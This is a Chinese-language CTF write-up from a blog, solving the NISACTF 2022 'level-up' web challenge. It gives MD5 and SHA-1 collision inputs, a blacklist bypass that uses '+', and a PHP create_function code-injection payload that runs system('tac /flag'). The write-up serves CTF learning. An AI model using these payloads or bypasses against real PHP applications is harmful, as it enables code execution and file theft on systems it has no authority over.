[NISACTF 2022]level-up

于 2023-04-27 11:20:24 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: nssctf web入门 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130392541
版权

[NISACTF 2022]level-up

f12 发现提示disallow 也就是不允许的想到robots.txt

LEVEL_2

<?php
//here is level 2    
error_reporting(0);   #屏蔽报错信息
include "str.php";    #包含str.php这个页面
if (isset($_POST['array1']) && isset($_POST['array2'])){ #if判断通过post传入的array1和array2是不是空
    $a1 = (string)$_POST['array1'];    #将通过post传递的array1转换为字符串类型并赋值给a1
    $a2 = (string)$_POST['array2'];    #将通过post传递的array2转换为字符串类型并赋值给a2
    if ($a1 == $a2){                   #判断a1是不是等于a2
        die("????");
    }
    if (md5($a1) === md5($a2)){        #判断a1和a2的md5值是不是一样
        echo $level3;
    }
    else{
        die("level 2 failed ..."); 
    }

}
else{
    show_source(__FILE__);              #将当前文件的代码高亮显示
}
?>

典型的md5值的题目

这里是强匹配加字符型所以0e和[]都不行

这里要用到md5真正一样的字符串

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2
4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

这两个16进制格式的两个不同子符串有同样的md5值

008ee33a9d58b51cfeb425b0959121c9

同样

0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef
0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef

也是一样的

cee9a457e790cf20d4bdaa6d69f01e41

 使用python脚本

from binascii import *
from urllib.parse import *
a1 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2'
a2 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2'

z1 = quote(unhexlify(a1))
z2 = quote(unhexlify(a2))
print(z1)
print(z2)

得到Level___3.php

LEVEL_3

 <?php
//here is level 3
error_reporting(0);     #屏蔽报错信息
include "str.php";      #包含str.php
if (isset($_POST['array1']) && isset($_POST['array2'])){ #判断post传入的array1和array2是不是为空
    $a1 = (string)$_POST['array1'];  #将attay1通过字符串转换并赋值给a1
    $a2 = (string)$_POST['array2'];  #将attay2通过字符串转换并赋值给a2
    if ($a1 == $a2){                 #判断a1和a2是不是相同
        die("????");
    }
    if (sha1($a1) === sha1($a2)){    #判断a1和a2经过sha1的值是不是一样
        echo $level4;
    }
    else{
        die("level 3 failed ...");
    }

}
else{
    show_source(__FILE__);
}
?>

 这里对于sha1的值我们可以去看SHAttered

使用

 array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

得到 level_level_4.php

LEVEL_4

 <?php
//here is last level
    error_reporting(0);    #屏蔽报错信息
    include "str.php";     #包含str.php
    show_source(__FILE__); #显示当前文件的原代码

    $str = parse_url($_SERVER['REQUEST_URI']);    #用于获取当前请求的url 并通过parse_url函数解析各个组成部分
    if($str['query'] == ""){                          #检查str数组中是不是为空 query为值
        echo "give me a parameter";
    }
    if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){ #判断str数组中有没有|、_、空格、.等字符
        die("blacklist here");
    }
    if($_GET['NI_SA_'] === "txw4ever"){  #判断通过get获得的NI_SA_是不是等于txw4ever
        die($level5);
    }
    else{
        die("level 4 failed ...");
    }

?>
give me a parameterlevel 4 failed ...

- query: 查询字符串,以?开头,包含键值对数据,比如?name=Jack&age=18

$_SERVER是PHP中的一个超级全局变量(superglobal),它包含了许多有关请求的信息

REQUEST_URI是$_SERVER数组中的一个元素,它包含了当前请求的URI(通常是路径和查询字符串)。比如,如果请求的是:
/products/12?color=red那么$_SERVER['REQUEST_URI']的值就是:
/products/12?color=red里面有query

这里要传入NI_AS_=txw4everAS_=txw4ever但是过滤了_

我们使用+绕过_

LEVEL_5

<?php
//sorry , here is true last level
//^_^ 
error_reporting(0); #屏蔽报错信息
include "str.php";  #包含str.php
 
$a = $_GET['a'];    #通过get方法获取a值
$b = $_GET['b'];    #通过get方法获取b值
if(preg_match('/^[a-z0-9_]*$/isD',$a)){  #判断a中有没有小写字母和数字
    show_source(__FILE__);
}
else{
    $a('',$b);  #调用a并包含b
}

 这里的a最后是$a()是函数使用方法,b为函数执行的值

我们通过create_function()函数由于可以让用户输入的内容被当作PHP代码执行

由于preg_match()函数在判断字符串时,会将\作为转义字符处理。所以,实际上这个判断语句会将\create_function视为:c r e a t e _ f u n c t i o n

然后在b中}system('tac /flag');/*

这里面因为$a('',$b);使用b的值会被当成参数而不是php代码来执行

b中的}/*会先结束if判断中的a函数运行然后system('tac /flag');才会真正的在a函数中

最终通过?a=\create_function&b=}system('tac /flag');/*

许允er
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL2022-SSEI-Dev
11-14
1. **安全增强**:SQL Server 2022 可能会包含新的安全功能,如动态数据 masking、透明数据加密(TDE)、列级权限管理、Always Encrypted 和 Row-Level Security。这些特性有助于保护敏感数据,防止未经授权的访问。...
[NISACTF 2022]上
qq_62046696的博客
07-26 3658
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
NSSCTF web刷题
akxnxbshai的博客
08-15 3241
闲来无聊写一写NSSCTF
[NISACTF 2022]level-up wp
Leaf_initial的博客
04-12 660
好题!上来显示nothing here但是通过查看源码可以知道有Disallow指令,说明有robots.txt文件,直接访问 Disallow指令例如,如果一个网站有一个包含私人信息的目录,如 /private,但不希望搜索引擎抓取这个目录下的内容,就可以在 robots.txt 文件中使用 Disallow 指令来限制访问,如下所示: 找到了level2,直接访问,然后开始代码审计 这里一开始想用数组绕过,但是返回????说明在弱比较的时候就寄了,没办法,只能用md5强碰撞,构造payload(这里用h
Level-UP
03-07
Level-UP】项目是一个基于GitHub的网页项目,其主要目标是提升用户的技能水平,特别是针对前端开发者。项目名称“Level-UP”暗示了它的核心理念,即通过一系列的学习资源和练习来帮助开发者升级自己的技术栈。从...
level-up-project
03-27
启动应用程序 以下是用于启动applicaion和api的核心脚本: 首先,您要安装依赖项Yarn [前端](角度) yarn start [api](NestJs) yarn start:api 该项目已经过单元测试和端到端测试 以下是我们用于测试的核心...
Laravel开发-level-up
08-28
"Laravel开发-level-up"的主题旨在帮助开发者提升在Laravel框架中的技能,实现项目开发的专业化和高效化。在这个主题下,我们将深入探讨一系列关键知识点,以便于你更好地理解和掌握Laravel的核心概念。 **1. MVC ...
nss-level-up-client
02-18
该项目是通过。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。yarn test 在交互式监视模式下...
NISACTF_WriteUp
The code way of kinnisoy
03-28 7591
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
NSS [NISACTF 2022]level-up
Jay17的博客
04-12 753
NSS [NISACTF 2022]level-up
md5强比较&弱比较
m0_75178803的博客
04-24 3769
强比较:使用三个 ''==='' 比较,比较值,也比较类型。弱比较:使用两个 ''=='' 比较,只比较值,不比较类型。所以0e,无论后面跟什么值,都是0。如:2760000=2.76×10^6=2.76e6。密文 原值。QNKCDZO 240610708 常用。计算器表达10的幂一般是用E或e。科学记数法是一种记数的方法。MD5加密登录万能密码。
[NISACTF 2022]
snowlyzz的博客
09-09 6085
NISACTF部分WP
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4736
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2156
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4450
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
2022NISACTF
unexpectedthing的博客
07-13 1423
NISACTF
siggraph2022 PRACHTICAL LEVEL-OF-DETAIL AGGREGAATION OF FUR APPEARANCE
最新发布
06-12
你提到的SIGGRAPH 2022论文《Practical Level-of-Detail Aggregation of Fur Appearance》是一个关于动物毛发渲染的新研究成果。该论文提出了一种实用的毛发外观细节层次聚合方法,可以在保持渲染效果的同时,显著...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值